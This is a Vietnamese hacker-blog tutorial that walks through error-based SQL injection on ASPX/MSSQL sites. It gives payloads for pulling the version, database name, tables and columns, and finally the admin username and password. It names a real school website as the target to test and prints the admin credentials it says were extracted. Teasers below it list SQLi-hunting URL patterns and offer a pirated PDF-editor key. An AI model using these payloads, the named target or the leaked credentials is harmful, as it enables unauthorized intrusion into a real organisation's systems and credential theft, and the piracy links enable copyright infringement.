Chuyển đến nội dung chính

TIP KHAI THÁC SITE DẠNG ASPX

------------------------------------
TUT KHAI THAC SITE DẠNG ASPX--------------------------------
Cũng giông như các dạng khác ta thêm dấu " ' " vào đuôi link hoặc vào thanh tìm kiếm của web site để biết site có lỗi hay không
----> victim cho các bạn test: thptnguyenthaibinh.edu.vn
~~~~~Làm từng bước theo tut nhé

++++Tim version: 'and 1=convert(int,(@@version))-- -


++++Tim database: 'and 1=convert(int,(db_name()))-- -


++++tim thong tin table:
'and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -         (1)


++++tim cac table khac table da tim dc o tren(1)
'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('các table t`im đc')))-- -


****tai sao phải them (((where table_name not in ))) ý nghĩa la tim các table khac ngoai cac  table da tim dc

----Tìm cho đến khi tìm đc cái table như: admin,user,....)thì dùng lại

@vd :'admin'
bay giờ tim ra admin r thi dừng lại (chưa t`im đc th`i cứ t`im ti^ếp)
----->tiếp theo ta:
++++Tìm thông tin table 'admin' vừa tìm đc

ta đang khai thác table 'admin'
nen dong lệnh sẽ thay đổi

'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin')))-- -

@ví dụ tim đc từ 'admin': là 'ID' thì:

----Ta làm tương tụ như ở trên
 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin') and column_name not(khác) in ('ID')))-- - delete từ khác đi nhé

Ta khai thác đến khi naò tìm đc :
-ở đây thì mình khai thác đc là :username và password
?:roi lam sao co user va pass
TA dùng lệnh cụ thể trong table username và password

'and 1=convert(int,(select top 1 username from admin))-- - để biết tài khoản
'and 1=convert(int,(select top 1 password from admin))-- - để biết mật khẩu

username: 'admin'
password: 'bongbi0917343846'

                                                                  %%%%%TUT VIẾT BỚI MINH TRỰC ---GLOOMY HACKING TEAM (GHT)%%%%%%
EDIT BY Jo3

Nhận xét

Bài đăng phổ biến từ blog này

Free 2000 Drok Tìm Kiếm Website lỗi SQLi

index.php?id= trainers.php?id= buy.php?category= article.php?ID= play_old.php?id= declaration_more.php?decl_id= pageid= games.php?id= page.php?file= newsDetail.php?id= gallery.php?id= show.php?id= staff_id= newsitem.php?num= readnews.php?id= top10.php?cat= historialeer.php?num= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= newsone.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= product-item.php?id= sql.php?id= news_view.php?id= select_biblio.php?id= humor.php?id= aboutbook.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id= faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id= pages.php?id= announce.php?id= clanek.php4?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id= read.php?id= prod_detail.php?id= viewphoto.php?id= person.php?id= productinfo.php?id= showimg.php?id= view.php?id=

Foxit Phantom 2.2.4.0225 full key- đọc, chỉnh sửa và in file PDF

Foxit Phantom là phần mềm cực nhẹ, cực chuyên nghiệp trong việc đọc, chỉnh sửa và in file PDF. Bạn có thể tùy chỉnh mọi thứ trong file PDF giống như word vậy. Mình sẽ share với các bạn bản cài đặt mới nhất 2.2.4.0225 và đặc biệt là có file key cho các bạn dùng, các bạn ko phải lo đến vấn đề tìm crack nữa. Link download :  http://www.mediafire.com/?6u2vnjvfcsvorca  https://drive.google.com/file/d/1ZLtZ1Uqd9Z4oU-LCVcbGMITTEnw_W-kH/view?usp=sharing https://www.fshare.vn/file/T9JNEO1QDDH1

Công cụTheo dõi Cách cập nhật giá cryptocurrency thực trên Google Sheets để quản lý danh mục đầu tư

Xin chào anh em, hôm nay mình xin giới thiệu với anh em một cách để cập nhật giá cryptocurrency theo thời gian thực trên Google Sheet. Mình biết nhiều anh em cũng như mình đang quản lý danh mục đầu tư bằng Google Sheet và gặp phải khó khăn lớn nhất là phải nhập tay giá của từng đồng crypto theo thời gian thực, và mỗi lần muốn cập nhật danh mục thì lại phải nhập tay lại từ đầu. Trong bài viết ngày hôm nay mình sẽ giải quyết khó khăn đó cho anh em. Có thể nhiều anh em chỉ quản lý danh mục trên trang Blockfolio hoặc app Coin stats, tuy nhiên các trang hay app thường chỉ thống kê chính xác giá trị danh mục, còn lời lỗ thường sai. Mình thì thích tính lời lỗ chính xác nên hay dùng Google Sheet hơn, nay có thể cập nhật giá crypto ngay lập tức thì mọi thứ trở nên thật sung sướng. Lưu ý là mỗi lần mở file Google Sheet lên thì dữ liệu sẽ được tự động cập nhật, nhưng lúc đang xem thì giá sẽ không nhảy, F5 cũng không được (do API). Anh em cứ làm theo như mình hướng dẫn thì sẽ cập nhật giá